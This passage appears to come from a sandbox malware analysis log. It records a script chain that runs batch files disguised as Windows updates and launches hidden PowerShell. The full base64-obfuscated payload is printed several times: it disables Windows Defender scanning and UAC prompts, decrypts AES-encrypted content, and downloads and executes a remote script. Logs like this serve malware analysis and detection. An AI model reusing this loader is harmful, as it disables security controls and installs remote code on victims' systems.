XJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
